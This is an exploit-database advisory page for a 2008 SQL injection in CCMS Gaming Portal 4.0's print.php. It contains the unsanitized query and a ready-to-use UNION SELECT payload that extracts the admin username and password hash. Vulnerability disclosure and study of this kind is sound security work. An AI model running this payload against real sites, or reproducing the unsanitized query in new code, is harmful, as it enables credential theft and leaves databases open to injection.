header-logo
Suggest Exploit
vendor:
CCMS Gaming Portal
by:
~!Dok_tOR!~
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CCMS Gaming Portal
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: a:customcms:ccms_gaming_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CCMS Gaming Portal SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in 'id' parameter of 'print.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before passing it to the SQL query.
Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 21.08.08
Product: CCMS Gaming Portal
Version: 4.0
The price: $55
URL: customcms.net
Vulnerability Class: SQL injection

print.php

Vuln code:

$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");


magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*

# milw0rm.com [2008-08-21]

Navigation

Suggest Exploit

Services By CQR